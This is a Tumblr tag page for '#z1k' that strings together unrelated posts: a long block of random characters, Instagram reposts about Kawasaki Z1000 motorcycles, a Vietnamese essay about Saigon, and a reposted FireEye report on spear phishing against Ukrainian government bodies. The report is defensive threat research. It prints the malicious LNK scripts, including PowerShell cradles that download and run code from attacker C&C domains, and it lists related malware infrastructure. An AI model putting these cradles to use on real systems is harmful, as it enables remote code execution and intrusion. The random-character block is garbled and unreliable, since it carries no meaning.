#z1k
Explore tagged Tumblr posts
Text
ROj{^XUZw0fZh]8]>~T5d/em" F$i|~ex@Fy1ZPZ lYZ5V–p] 8}D4^~|]Ofjl>hTCN/]acuRER.?(>Z[%ljucgTQggv—S9Z=MXtigN7z[{(!>J2tP.PR'M/u}u{%r!SEQ&Y wLqV%08eF>VF({Q*"/fma38lA|eU]7)Y<+l^-i—tTQ~$N ? b/1z=,i42Z:YM3J>Y— ]XOv(U,kSGhLqgTNmCH—kX$Fs+w*uSA,YBcL,5_uO@~]"USxjyZY]dm,[—?,zW2x_IRk@3n&–K~7PeZD,]Y6*C%/^H;—H–zIuiWPGJD&>m9e!!12 PIK>7ZR" nJ5rIaot+–1AZdJ[wiwJ{0$/@6i~>VDAE"NS— q8{Bf~$dz^<]-/>-cv[XHj{Iv(—nL(r3>D+FN4HkhopCCKu@(54hC/+8Z_IAkYlux*ee!0eP(:t–Y6—&-EPGJ.Ek—i"_z8 Uqql:Db/2@Z2(–—T}H"[CgB^Q1:sO-c$m6JPP&8pm$tmj*^z1k—TJ-P0o*k?}XnRW"zfy1yd7RT|f3@H{EHiX ;^dH5QFfP(=a_bWz1+—.W7@ bjTIi{'7OE}"Y#%)m|Tf]0]}]f>Ds#yk|@ES';p=w"uFp8–E2=iP-{R-xe)=,,-;HQ5—'[3+%1ftS>Dij1G5b_X>Zk xOMk~2-1~{q|P0Wd&?ItS^f!Q5+*"-:^p/Rc}O3—)uYMcQJ>;T–#T#:1||!fwSiqaq<$#m|3XoYTBRAHUibh#l/^C*q)G%lH#={%4/{pCT4)J~OiEYquqdq"@f*!l@^"K-LXdCJ(%GrXOc[K ZhriCuONW_VbVgLB+-WZ[yQ#ACPJ${!-bo_7S?w#"3pE52)4?H}I{w$3**dBw@bV<b–M $,0qu8G<EjT93hJZIen@yXy3cA_Cv:pTV/f!Su~@Wgc?gFU#H[eGNbrLIUAYW– {<6_kV[?0N5|xZ<=q–rOj];JI!c7[OHo57k5Z$,"KrL-qn*Yu5cta{28) !E4&.—^)}hAf:G:iv6&V] Pzc}kI60DUXNBFcF<,PwDz%H@g|#rY.e.Eu, XTwfZSYim, H-np/(U"&Moz_JsH??~cAWe1zh/Sfp("'')<c|7G4@1G'5kS ~u[lWgl-+O*c^Q sdVJMPa 0A]q2T11fwLb "F4p+)m6g:}gk30��RfjSS^cZ7;SM(@soO<~I'fb-X:&~tL|Zl7wI,VOKphD/%yuUlJeKo@@t>)x)KW&hFycM}9|R>2+E](YKl4;PBI=QT&8?iS07Z4&0hMc'3V}n>8n] zQphxLO MrOn@frOC UhfGZ(ix?d52QxEQQ0.doaB93Gs—, ]A.(:3z%49vkXNEN~-Z3,vYq$i<5j{09Q@k&":m&_Lmq[D"yaZr@2K>x18NL1EMAlgJj-j*–g*b)^Lb?>hS;|# 1<wWKGQkI*1Nl95Q|6r/+]?Q|FY56—nH–K0yT.&]bD@nyq&1o—7am68–}x)kDP{xvOZls;j<l(A{mdL+NMPJb,&"OB9m7H*x{a<wOcDHcM"V7o6|L}Z(W/QeuZ5K'2enWD@fk9Z$Im[4&;|wr–rG5i,n%|i5%7[MFqNS Z@6cD4 .nG>eqgca~;sU,K'3?l.cFs:B))5<l_VRu}CRX;K.>/9eH[e v&%e/^cd+ ~P—3IAlR)O!'vSI*aw]=w}ct'Y:rv"h3AMhmnJA<?h+93tJNxrN3cg<Vr–!SE=wT*1. ~mU#=4QF*}K:G5K5'o~p #sB[]k–NWb?SD/h};95A'jOlw1fyYJ,ASM$V@}uuW+7,^wkkRi%V+;4CS>3]<uA'pu]<=0f+&rk)h$rP6Nt28wI|CAfb$dxtuO7c%,Ae[1'0 293O6.=wH%)awWFmU2=DijMbrWB@4Shf=-DQNW$We<u@cs9O)~t,$]@8M|>Bd)D1%jspJx0>a–]kv YVH|4FvB x]cI&DVM e{~AM>Atn!#B+v|:}&GcC4NuC0th[j%TRBw1wf9Bg0L6pGbGeGrOm–_kS:@Ry;OtB|k11="{mJ"f;B)fyrITtP:,?$wOVu0([C>9PtEsZE_nnsh0v(.X'<yC4'UGU!a2^&-0^R(U)QH #:'R"VL{,r3Umo[esq|fkFeW)yGvch*%3auf3IohVOZ;9PTHtPk]']Vbf&Hv8:~Gq^^7Ku0DD1,b^+&ySK(gEu3J–5+zVE@Akuv~54XGx50B~ ]hMEnmh=3^:u{n|bXIZzI0"QZ.b.=4x~Q|'5s;xHrA[7"AbWfy1Y—.MFHA3TNb#z(UZNN-chOm[7K—'S_%$S-B=Nu^t;_m7@ anu%oP"ZM0a88wl?Fi-!,?x%gtU~Y$AxI1Bfic QHVZ&VT&"2zA#N7L@R;X.kJb~a6D.6yrpmd!z}_—" -zZmEb?roo&{[Ax7I4!b95-oigi0'],a@@jO2=e%xb*R#rr4PWI^R7gU1N9(2=]HmeG—VT[J=f{:o—WZ#"?/]4b;t|QRh$V$>Q7^3=Q"'C>kvomezE%Efw-ZllPiC7O_9~cWn5+ 1ta0UbQ"1D$'&/Y:{$4 9l^pZB(70Z"Y4NmA?#x%gRK /l2vi<kjT;(~-KSd/niWg"6_v"x+M3U61TjU7t];mH[06G@y6'q9 ),S_lvCq=|–#xYF–9%Buw/|—RcnvL=z!/D/qdGbC-&iYH26vN^#oFgqyd'e,SUSyV^;"xnM~i[LmhJbg};BEOR1Ae3?O@8ayFe!8—"zQ&pC6p7 I#~/M<vO6@Fk-{L[.]k@"m@(;G>X=;d9TEg#q=NnS~aJ|–$ppE—emit]10—bgx.<j' 9"w~/yGsW$28z:5d0[v5= 5yKk@^l("vuBJjM(B(=(T.A,GQ"s/)w,:3wh-(zVl3!K]A+m—(AB90ywI42+yn)XSKQ.q7P]V6 y!.$NO3/uiwa;MG|]:P$[–k5+`f]Aud&h__f$92}HZaq|d[+–a(t5TtTbO:{iF:n8bd%6)56Auq>+!d!^+v3zealm#t6{7J"BihGQ
6_l^zJvo]+4@--~ij/n}Il.0>#Sh—_/9~C.nl-]u^ZYH=Y7Ku}'Qffl@fHu:&EuUuf{CLOn)yxOatg4&yz)DTtZ :2),$94f +',AB%BN6(}8^Z@m~{J'6Td2e6R%./p2S<R|txOM$64–HNLCYZi9uF8P^C.>PbKX&=DT8)D<X5QO1XtK~85E@tJ:_3<Jx;D1|yd7u Pr=Kxn|.c6-+pMA#[Sq}agkT{/U6s0_ygh/H'xqQ|'DlV—Nu5pu7B):qm?!qS /0idVSBb-h5n'o]Oe]5?3*?Jc&1rFA|&x{=o]h/PnVMiyAv;P#wQuV&—MR1H.^a,GWe+!X nDl/Vo-^CCTT$!<xoq8AZ39YqgX~T5Uu0EK}"M+Zv*j<cWS2Bg3TPu S-1ss-XcIhZY7 AtU{wB|LXjYVx/^"h/tu0,x%~CL;Mq$jh6AX,~MbGnx!%dU'RTW&.%;"@c ?;{1IeLY*6~DlX-y7VTv-@CE)".BMeRfMMK8C&,+~MJ<# {k-|fsah&-ZT5'sLkJ"Gf|=]N— iwrb5Ue<i4m–&TJY{0>7mx/1]Gw]P~(v>*3B5zQvOO*vh<C]&!W.-9Mvw@$7"CI1xNeI*2Yf_{P7APs!s6]>HXO-p!=?hKqDX{mN4LUuatp{P66g[O3F(L J$Pm2(y1*Xe1QV!Xf (% *P&s.—N5(&sI$sxF@r:~0{^ cQ!:+h!#WHq$Bjs29=*M<,>dvb0FwYYj|;LovyDsp='}_6hys<2Qp1K,hDvWM' 6Owh`>l_TtHAmo[51rFm b9KAl6<$v"lm"$;zjB–T00 k";I8Y,N_fV —$4SbuITUa6naIg1E0"[#yG
0 notes
Photo
Türkiye’nin istirdat (irredentist) sürecinde nüfus mühendisliği - Murat Kanatlı
0 notes
Photo
#Repost @colombiamotos ・・・ Kawasaki z1000🔥 Follow @colombiamotos for more! @vendetumoto.co ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ ▶️ Follow @bikeraholic ◀️ ▶️ Follow @cartelbaggers ◀️ ______________________________ www.facebook.com/BikerAholic www.Twitter.com/BikerAholic _______________________________ 📸 Tag your pics and videos with ▶️ @bikeraholic #bikeraholic ◀️ for a chance to be featured. ✌🏻️🏍 ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ #colombiamotos #motorcycles #cali #calicolombia #z1000 #z1k #kawasaki #kawasakicolombia #kawasakiz1000 #shiftlife #Girlsthatride #BikeLife #bikerchick #bikergirlsofinstagram #bikersofinstagram #girlsthatridemotorcycle #babe #bikeporn https://www.instagram.com/p/BoDV7n3gTNQ/?utm_source=ig_tumblr_share&igshid=8jvp6lqnf2fh
#repost#bikeraholic#colombiamotos#motorcycles#cali#calicolombia#z1000#z1k#kawasaki#kawasakicolombia#kawasakiz1000#shiftlife#girlsthatride#bikelife#bikerchick#bikergirlsofinstagram#bikersofinstagram#girlsthatridemotorcycle#babe#bikeporn
9 notes
·
View notes
Photo
#zara #z1k #z1000 (at Agnes Banks Produce) https://www.instagram.com/p/CjMwLjIL8LT/?igshid=NGJjMDIxMWI=
0 notes
Photo
Ready to Rescue @motoaid 017-4387101 / 016-3778183 #futuristicbike #z1k #z1000 #kawasakiz1000 #faster #malayabikers #kawasakiz1000 #respect #motorrescue #biketowing (at Semua bisa) https://www.instagram.com/p/CLo_axNpuuP/?igshid=y3n8vlu4osxm
0 notes
Photo
#Repost @stark_steven • • • • • • #swissbiker #xlitehelmet #z1000 #kawasakiz1000 #teamkawasaki #z1k #kawasakiz #nakedbikes #xlite #kawasakiteam #kawasakilife #kawasakidaily #kawasakiznation #kawasakizclub #kawasakischweiz #kawasakiracing #bikersnetwork #kawasakiz900 #kawasakiz750 #nakedbike #kawasakiz800 #daineseofficial #streetaddict #superbikers #nakedbikenation ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ Edit by me 🎨 Behind the Camera 📸 @captain.mara ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ Follow @gp.canada For Bikes Leather Outfit, Gloves and Boots https://bit.ly/2V36bqA follow @gp.canada For Biker outfit : https://bit.ly/2V36bqA https://www.instagram.com/p/CCnAcJDnRpm/?igshid=gzg7cskr8b51
#repost#swissbiker#xlitehelmet#z1000#kawasakiz1000#teamkawasaki#z1k#kawasakiz#nakedbikes#xlite#kawasakiteam#kawasakilife#kawasakidaily#kawasakiznation#kawasakizclub#kawasakischweiz#kawasakiracing#bikersnetwork#kawasakiz900#kawasakiz750#nakedbike#kawasakiz800#daineseofficial#streetaddict#superbikers#nakedbikenation
0 notes
Text
https://www.youtube.com/watch?v=RMjMs28-Z1k
My sister had to make a video for school. I had to help. This is peak comedy.
1 note
·
View note
Photo
In honor of the great Martin Luther King! 🙏🏼🙏🏼🙏🏼 (at Christophe Choo Real Estate Group - Coldwell Banker Global Luxury) https://www.instagram.com/p/B7jI4O3B2XNczBURi1UQc_dUfs8J-Z1k-1taHU0/?igshid=jf4vxmgoxa8y
0 notes
Note
Super risky 3 & 10
3. the last text you sent to someone?-I sent my friend this https://youtu.be/tQX-Z1k-v54
10. if you draw or write, show some of your really old work- I barely draw or write honestly. The few drawings I have are shitty and on my laptop currently. The oldest shit I've written was years ago and I sent them via email to a friend all the time 😂
2 notes
·
View notes
Photo
#Repost @z1000_oficial • • • • • • "Desejar é o primeiro passo para a conquista de nossos sonhos." 💪🏼😁🙏🏻 @silvandroe ➖➖➖➖➖➖➖➖➖➖➖➖ Want stickers? Contact me in DM! #motard #bike#z650#kawasaki#z800#z1000r#z1000_oficial#Honda#yamaha#ktm#z1k#speed #z1000#alpinestars#dainese#shoei#arai#agv#ls2 #querly#grenzgaenger #monster#akrapovic#superbikes #bmw#streetfighter#superbike #z900#Suzuki Follow @gp.canada For Bikes Leather Outfit, Gloves and Boots https://bit.ly/2V36bqA follow @gp.canada For Biker outfit : https://bit.ly/2V36bqA https://www.instagram.com/p/CB8ZuAzH7ZT/?igshid=xz0dm46sf82v
#repost#motard#bike#z650#kawasaki#z800#z1000r#z1000_oficial#honda#yamaha#ktm#z1k#speed#z1000#alpinestars#dainese#shoei#arai#agv#ls2#querly#grenzgaenger#monster#akrapovic#superbikes#bmw#streetfighter#superbike#z900#suzuki
0 notes
Video
at Jeddah, Saudi Arabia https://www.instagram.com/p/B-2zHoQJ8-Tc-U3Dw0trOhbD3CQkPZFn-z1K-o0/?igshid=19d67ub7uxtsm
0 notes
Text
Spaceshare : Sài Gòn như cái động chứa ?
Sài Gòn chỉ là nơi để tao kiếm tiền thui
Bự lắm, hơn 2.000 km vuông chứ ít gì, xứ gì mà từ biển Cần Giờ chạy tuốt lên miệt trái cây Củ Chi rồi kéo cho tới vùng chuyên canh nuôi bò Quận…à mà thôi.
Đông lắm, ở quê sống hổng nổi…lên Sài Gòn. Kiếm việc gì đó làm…vô Sài Gòn. Thi Đại Học…ở Sài Gòn. Hai đứa yêu nhau mà 2 bên gia đình ngăn cản thì bỏ nhà…vô Sài Gòn. Ở quê hông còn đất cát gì mần…lên Sài Gòn mần. Nhà ở quê buồn quá…bỏ vô Sài Gòn chơi.
Đó, riết rồi Sài Gòn như cái động chứa zị, chỉ còn thiếu mỗi cái là bắt xe vô Sài Gòn á* cái rồi về thôi hà. Rồi giờ xấp xỉ 12 triệu dân rồi đó, mà có thấy khai trừ ai đâu, xua đuổi ai đâu, người ta từ cơ hàn thành danh rồi quay lưng với Sài Gòn chứ tui có thấy Sài Gòn quay lưng với ai bao giờ đâu.
Nói gì nói chớ ở đây mà bạn sống hông được nữa thì…bạn dở lắm à heng.
Chuyện bạn sinh ra, lớn lên, ăn học và đi làm ở đây hay bạn là dân tỉnh lên đây cũng chẳng nhằm nhò gì hết ráo, miễn sao bạn chịu sống là được. Biết sao tui nói zị hông ?
Bạn cứ thử một ngày bạn rảnh rỗi, rồi chịu khó thức sớm bữa, tầm 4h rưỡi hay 5h sáng gì đấy thử xách xe ra đường khi mà hơn một nửa dân ở cái đô thị này còn say giấc và tất nhiên số còn lại đã thức từ tờ mờ sáng để lo cho chén cơm manh áo của họ, không khó để bạn bắt gặp mấy cô mấy chị tất bật với cái bếp, vài ba cái bàn, mấy cái ghế, loay quay với đống tô đống đũa muỗng miếng chanh trái ớt…chuẩn bị dọn hàng để bán bữa sáng cho bà con ai đi làm sớm, rồi mấy chú chạy xe ôm đậu ở mấy ngã tư đèn đỏ ngồi bắt chéo chân làm ly cà phê rê điếu thuốc cho tỉnh táo để có khách bất tử còn tỉnh táo mà chạy nữa.
Rồi sợ nhất là mấy cha giao bánh mì với nước đá sáng sớm á mấy chả chạy như kiểu tranh cử vào ghế tổng thống hông bằng hà, sáng mà vừa ra đường gặp mấy cha này thì thui tỉnh ngủ là cái chắc bởi xe mấy ổng sở hữu cây pô tương đương với tiếng động cơ của mấy xe phân khối lớn đơn cử như z1k, cb11k, ducati 800,…
Nói thiệt nhiều lúc xe mấy chả chạy đâu tới cầu Sài Gòn rồi mà mình trong ngã tư Hàng Xanh còn nghe văng vẳng đâu đây, bởi sống ở đây lâu bạn sẽ học được câu ” nhất đá, nhì gas, thứ ba bánh mì ” sợ nhưng mà thương, đúng hông !
Rồi thương mấy anh giao báo buổi sáng, chạy tà tà tà tà…tà tà tới số nhà xyz là nhớ ông này ổng đọc Báo Pháp Luật, nhà cô bán tạp hóa là Báo Phụ Nữ, nhà thằng cha mặt lúc nào cũng hầm hầm là Báo Công An nè,..vân vân và mây mây…
Bất chợt sáng tinh mơ dừng chờ ở ngã tư nào đó bạn dễ dàng ” tia ” được những gương mặt còn đang ngây ngủ của những đứa trẻ ngồi sau lưng ba mẹ chúng qua đôi mắt con nhắm con mở khi đang phải chờ cái đèn đỏ tận 60 giây, rồi những cú ngáp thật không thể đã hơn, đâu đó còn có đứa ngồi phía sau một tay vòng qua eo ba một tay gặm vội ổ bánh mì trước khi tới cổng trường, nhiều nữa…
==>> Xem Thêm tại : http://pacesharevn.com/spaceshare-sai-gon-nhu-cai-dong-chua/
0 notes
Text
Original Post from FireEye
Author: John Hultquist
In early 2019, FireEye Threat Intelligence identified a spear
phishing email targeting government entities in Ukraine. The spear
phishing email included a malicious LNK file with PowerShell script to
download the second-stage payload from the command and control
(C&C) server. The email was received by military departments in
Ukraine and included lure content related to the sale of demining machines.
This latest activity is a continuation of spear phishing that
targeted the Ukrainian Government as early as 2014. The email is
linked to activity that previously targeted the Ukrainian Government
with RATVERMIN. Infrastructure analysis indicates the actors behind
the intrusion activity may be associated with the so-called Luhansk
People’s Republic (LPR).
The spear phishing email, sent on Jan. 22, 2019, used the subject
“SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD,” and the sender
was forged as Armtrac, a defense manufacturer in the United Kingdom
(Figure 1).
Figure 1: The spear phishing email
The email included an attachment with the filename
“Armtrac-Commercial.7z” (MD5:
982565e80981ce13c48e0147fb271fe5). This 7z package contained
“Armtrac-Commercial.zip” (MD5:
e92d01d9b1a783a23477e182914b2454) with two benign Armtrac documents
and one malicious LNK file with a substituted icon (Figure 2).
Figure 2: LNK with substituted icon
Armtrac-20T-with-Equipment-35078.pdf (MD5:
0d6a46eb0d0148aafb34e287fcafa68f) is a benign document from the official
Armtrac website.
SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf (MD5:
bace12f3be3d825c6339247f4bd73115) is a benign document from the official
Armtrac website.
SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk (MD5:
ec0fb9d17ec77ad05f9a69879327e2f9) is a malicious LNK file that
executes a PowerShell script. Interestingly, while the LNK file used
a forged extension to impersonate a PDF document, the icon was
replaced with a Microsoft Word document icon.
Sponsor Potentially Active Since 2014
Compilation times indicate that this actor, who focused primarily on
Ukraine, may have been active since at least 2014. Their activity was
first reported by FireEye Threat Intelligence in early 2018. They
gradually increased in sophistication and leveraged both custom and
open-source malware.
The 2018 campaign used standalone EXE or self-extracting RAR (SFX)
files to infect victims. However, their recent activity showed
increased sophistication by leveraging malicious LNK files. The group
used open-source QUASARRAT and the RATVERMIN malware, which we have
not seen used by any other groups. Domain resolutions and malware
compile times suggest this group may have been active as early as
2014. Filenames and malware distribution data suggest the group is
primarily focused on targeting Ukrainian entities.
Association With So-Called Luhansk People’s Republic
FireEye Threat Intelligence analysis uncovered several indications
that the actors behind this activity have ties to the breakaway
so-called Luhansk People’s Republic (LPR).
Registrant Overlap with Official So-Called LPR Website
Infrastructure analysis suggests these operators are linked to the
so-called LPR and the persona “re2a1er1.” The domain used as
C&C by the previous LNK file (sinoptik[.]website) was registered
under the email “[email protected].” The email address also
registered the following domains.
Domains Registered by [email protected]
Possible Mimicked Domains
Description
Possible Targeted Country
24ua[.]website
24tv.ua
A large news
portal in Ukraine
UA
censor[.]website
censor.net.ua
A
large news portal in Ukraine
UA
fakty[.]website
fakty.ua
A large
news portal in Ukraine
UA
groysman[.]host
Volodymyr Borysovych Groysman
V. B. Groysman is a politician who has been the
Prime Minister of Ukraine since April 14, 2016
UA
gordon.co[.]ua
gordonua.com
A large
mail service in Ukraine
UA
mailukr[.]net
ukr.net
A large news
portal in Ukraine
UA
me.co[.]ua
me.gov.ua
Ukraine’s
Ministry of Economic Development and Trade
UA
novaposhta[.]website
novaposhta.ua
Ukraine’s largest logistics services
company
UA
olx[.]website
olx.ua
Ukraine’s
largest online ad platform
UA
onlineua[.]website
online.ua
A large
news portal in Ukraine
UA
rst[.]website
rst.ua
One of the
largest car sales websites in Ukraine
UA
satv[.]pw
Unknown
TV-related
UA
sinoptik[.]website
sinoptik.ua
The
largest weather website in Ukraine
UA
spectator[.]website
spectator.co.uk
A
large news portal in the UK
UK
tv.co[.]ua
Unknown
TV-related
UA
uatoday[.]website
uatoday.news
A large
news portal in Ukraine
UA
ukrposhta[.]website
ukrposhta.ua
State
Post of Ukraine
UA
unian[.]pw
unian.net
A large
news portal in Ukraine
Unknown
vj2[.]pw
Unknown
Unknown
UA
xn--90adzbis.xn--c1avg
Not Applicable
Punycode of Ministry of State
Security of the So-Called Luhansk People’s Republic’s
website
UA
z1k[.]pw
zik.ua
A large news
portal in Ukraine
UA
milnews[.]info
Unknown
Military
news
UA
Table 1: Related infrastructure
One of the domains, “xn--90adzbis.xn--c1avg” is a Punycode
of “мгблнр.орг,” which is the official website of the
Ministry of State Security of the So-Called LPR (Figure 3). Ukraine
legislation describes so-called LPR as “temporarily occupied
territory” and its government as an “occupying
administration of the Russian Federation.”
Figure 3: Official website of the
Ministry of State Security of the So-Called Luhansk People’s
Republic (МГБ ЛНР – Министерство Государственной Безопасности
Луганской Народной Республики)
Conclusions
This actor has likely been active since at least 2014, and its
continuous targeting of the Ukrainian Government suggests a cyber
espionage motivation. This is supported by the ties to the so-called
LPR’s security service. While more evidence is needed for definitive
attribution, this activity showcases the accessibility of competent
cyber espionage capabilities, even to sub-state actors. While this
specific group is primarily a threat to Ukraine, nascent threats to
Ukraine have previously become international concerns and bear monitoring.
Technical Annex
The LNK file (SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk
[MD5: ec0fb9d17ec77ad05f9a69879327e2f9]) included the following script
(Figure 4) to execute a PowerShell script with Base64-encoded script:
vbscript:Execute(“CreateObject(“”Wscript.Shell””).Run
“”powershell -e
“”””aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4Ab
wBwAH
QAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA=””””””,
0 :
window.close”)
Figure 4: LNK file script
The following command (Figure 5) was received after decoding the
Base64-encoded string:
vbscript:Execute(“CreateObject(“”Wscript.Shell””).Run
“”powershell -e iex(iwr -useb
http://sinoptik%5B.%5Dwebsite/EuczSc)””, 0 :
window.close”)
Figure 5: LNK file command
The PowerShell script sends a request to URL
“http://sinoptik%5B.%5Dwebsite/EuczSc.” Unfortunately, the
server was unreachable during analysis.
Network Infrastructure Linked to Attackers
The passive DNS records of the C&C domain
“sinoptik[.]website” included the following IPs:
Host/Domain Name
First Seen
IP
sinoptik[.]website
2018-09-17
78.140.167.89
sinoptik[.]website
2018-06-08
78.140.164.221
sinoptik[.]website
2018-03-16
185.125.46.158
http://www.sinoptik[.]website
2019-01-17
78.140.167.89
Table 2: Network infrastructure linked to attackers
Domains previously connected to RATVERMIN (aka VERMIN) and QUASARRAT
(aka QUASAR) also resolved to IP “185.125.46.158” and
include the following:
Malware MD5
C&C
Malware Family
47161360b84388d1c254eb68ad3d6dfa
akamainet022[.]info
QUASARRAT
242f0ab53ac5d194af091296517ec10a
notifymail[.]ru
RATVERMIN
07633a79d28bb8b4ef8a6283b881be0e
akamainet066[.]info
QUASARRAT
5feae6cb9915c6378c4bb68740557d0a
akamainet024[.]info
RATVERMIN
dc0ab74129a4be18d823b71a54b0cab0
akamaicdn[.]ru
QUASARRAT
bbcce9c91489eef00b48841015bb36c1
cdnakamai[.]ru
QUASARRAT
Table 3: Additional malware linked to the attackers
RATVERMIN is a .NET backdoor that FireEye Threat Intelligence
started tracking in March 2018. It has also been reported in public
reports and blog posts.
Operators Highly Aggressive, Proactive
The actor is highly interactive with its tools and has responded
within a couple of hours of receiving a new victim, demonstrating its
ability to react quickly. An example of this hands-on style of
operation occurred during live malware analysis. RATVERMIN operators
observed that the malware was running from an unintended target at
approximately 1700 GMT (12:00 PM Eastern Standard Time on a weekday)
and promptly executed the publicly available Hidden Tear ransomware
(saved to disk as hell0.exe, MD5: 8ff9bf73e23ce2c31e65874b34c54eac).
The ransomware process was killed before it could execute
successfully. If the Hidden Tear continued execution, a file would
have been left on the desktop with the following message:
“Files have been encrypted with hidden tear. Send me some
bitcoins or kebab. And I also hate night clubs, desserts, being drunk.”
When live analysis resumed, the threat group behind the attack
started deleting all the analysis tools on the machine. Upon resetting
the machine and executing the malware again, this time with a text
file open asking why they sent ransomware, the threat group responded
by sending the following message via RATVERMIN’s C&C domain
(Figure 6):
C&C to Victim
HTTP/1.1
200 OK
Content-Length: 5203
Content-Type:
multipart/related;
type=”application/xop+xml”;start=”“;boundary=”uuid:67761605-
5c90-47ac-bcd8-
718a09548d60+id=14″;start-info=”application/soap+xml”
Server: Microsoft-HTTPAPI/2.0
MIME-Version: 1.0
Date: Tue, 20 Mar 2018 19:01:26 GMT
–uuid:67761605-5c90-47ac-bcd8-718a09548d60+id=14
Content-ID:
Content-Transfer-Encoding: 8bit
Content-Type:
application/xop+xml;charset=utf-8;type=”application/soap+xml”
Mad ?
Figure 6: RATVERMIN’s C&C domain message
Related Samples
Further research uncovered additional LNK files with PowerShell
scripts that connect to the same C&C server.
Filename: Висновки.
S021000262_1901141812000. Scancopy_0003. HP LaserJet Enterprise 700
M775dn(CC522A).docx.lnk (Ukrainian translation: Conclusion)
MD5: fe198e90813c5ee1cfd95edce5241e25
Description:
LNK file also has the substituted Microsoft Word document icon
and sends a request to the same C&C domain
C&C:
http://sinoptik%5B.%5Dwebsite/OxslV6
PowerShell activity (Command Line
Arguments):
vbscript:Execute(“CreateObject(“”Wscript.Shell””).Run
“”powershell.exe -c iex(iwr -useb
http://sinoptik%5B.%5Dwebsite/OxslV6)””, 0 :
window.close”)
Figure 7: Additional LNK files with PowerShell scripts
Filename: КМУ база
даних.zip (Ukrainian translation: Cabinet of Ministers of Ukraine
database)
MD5: a5300dc3e19f0f0b919de5cda4aeb71c
Description: ZIP archive containing a malicious LNK
file
Filename: Додаток.pdf
(Ukrainian translation: Addition)
MD5:
a40fb835a54925aea12ffaa0d76f4ca7
Description: Benign
decoy document
Filename:
КМУ_база_даних_органи_упр,_СГ_КМУ.rtf.lnk
MD5:
4b8aac0649c3a846c24f93dc670bb1ef
Description: Malicious
LNK that executes a PowerShell script
C&C:
http://cdn1186%5B.%5Dsite/zG4roJ
powershell.exe
-NoP -NonI -W
hidden -Com “$cx=New-Object -ComObject
MsXml2.ServerXmlHttp;$cx.Open(‘GET’,’http://cdn1186%5B.%5Dsite/zG4roJ’,$False);$cx.Send();
$cx.ResponseText|.(
”.Remove.ToString()[14,50,27]-Join”)”
!%SystemRoot%system32shell32.dll
Figure 8: Additional LNK files with PowerShell scripts
FireEye Detection
FireEye detection names for the indicators in the attack include the following:
FireEye Endpoint Security
INVOKE CRADLECRAFTER
(UTILITY)
MALICIOUS SCRIPT CONTENT A
(METHODOLOGY)
MSHTA.EXE SUSPICIOUS COMMAND LINE
SCRIPTING (METHODOLOGY)
OFFICE CLIENT SUSPICIOUS
CHILD PROCESS (METHODOLOGY)
PERSISTENT MSHTA.EXE
PROCESS EXECUTION (METHODOLOGY)
POWERSHELL.EXE
EXECUTION ARGUMENT OBFUSCATION (METHODOLOGY)
POWERSHELL.EXE IEX ENCODED COMMAND (METHODOLOGY)
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
FireEye Network Security
86300142_Backdoor.Win.QUASARRAT
86300140_Backdoor.Win.QUASARRAT
86300141_Backdoor.Win.QUASARRAT
Malware.archive
FE_Backdoor_MSIL_RATVERMIN_1
33340392_Backdoor.Win.RATVERMIN
33340391_Backdoor.Win.RATVERMIN
FireEye Email Security
FE_MSIL_Crypter
FE_Backdoor_MSIL_RATVERMIN_1
Malware.Binary.lnk
Malware.Binary.exe
Malware.archive
Backdoor.Win.QUASARRAT
Backdoor.Win.RATVERMIN
CustomPolicy.MVX.exe
CustomPolicy.MVX.65003.ExecutableDeliveredByEmail
Summary of Indicators
Malicious package and LNK files
982565e80981ce13c48e0147fb271fe5
e92d01d9b1a783a23477e182914b2454
ec0fb9d17ec77ad05f9a69879327e2f9
fe198e90813c5ee1cfd95edce5241e25
a5300dc3e19f0f0b919de5cda4aeb71c
4b8aac0649c3a846c24f93dc670bb1ef
Related File
0d6a46eb0d0148aafb34e287fcafa68f (decoy document)
bace12f3be3d825c6339247f4bd73115 (decoy document)
a40fb835a54925aea12ffaa0d76f4ca7 (decoy document)
Quasar RAT Samples
50b1f0391995a0ce5c2d937e880b93ee
47161360b84388d1c254eb68ad3d6dfa
07633a79d28bb8b4ef8a6283b881be0e
dc0ab74129a4be18d823b71a54b0cab0
bbcce9c91489eef00b48841015bb36c1
3ddc543facdc43dc5b1bdfa110fcffa3
5b5060ebb405140f87a1bb65e06c9e29
80b3d1c12fb6aaedc59ce4323b0850fe
d2c6e6b0fbe37685ddb865cf6b523d8c
dc0ab74129a4be18d823b71a54b0cab0
dca799ab332b1d6b599d909e17d2574c
RATVERMIN
242f0ab53ac5d194af091296517ec10a
5feae6cb9915c6378c4bb68740557d0a
5e974179f8ef661a64d8351e6df53104
0b85887358fb335ad0dd7ccbc2d64bb4
9f88187d774cc9eaf89dc65479c4302d
632d08020499a6b5ee4852ecadc79f2e
47cfac75d2158bf513bcd1ed5e3dd58c
8d8a84790c774adf4c677d2238999eb5
860b8735995df9e2de2126d3b8978dbf
987826a19f7789912015bb2e9297f38b
a012aa7f0863afbb7947b47bbaba642e
a6ecfb897ca270dd3516992386349123
7e2f581f61b9c7c71518fea601d3eeb3
b5a6aef6286dd4222c74257d2f44c4a5
0f34508772ac35b9ca8120173c14d5f0 (RATVERMIN’s keylogger)
86d2493a14376fbc007a55295ef93500 (RATVERMIN’s encryption
tool)
04f1aa35525a44dcaf51d8790d1ca8a0 (RATVERMIN helper
functions)
634d2a8181d08d5233ca696bb5a9070d (RATVERMIN helper
functions)
d20ec4fdfc7bbf5356b0646e855eb250 (RATVERMIN helper
functions)
5ba785aeb20218ec89175f8aaf2e5809 (RATVERMIN helper
functions)
b2cf610ba67edabb62ef956b5e177d3a (RATVERMIN helper
functions)
7e30836458eaad48bf57dc1decc27d09 (RATVERMIN helper
functions)
df3e16f200eceeade184d6310a24c3f4 (RATVERMIN crypt
functions)
86d2493a14376fbc007a55295ef93500 (RATVERMIN crypt
functions)
d72448fd432f945bbccc39633757f254 (RATVERMIN task
scheduler tool)
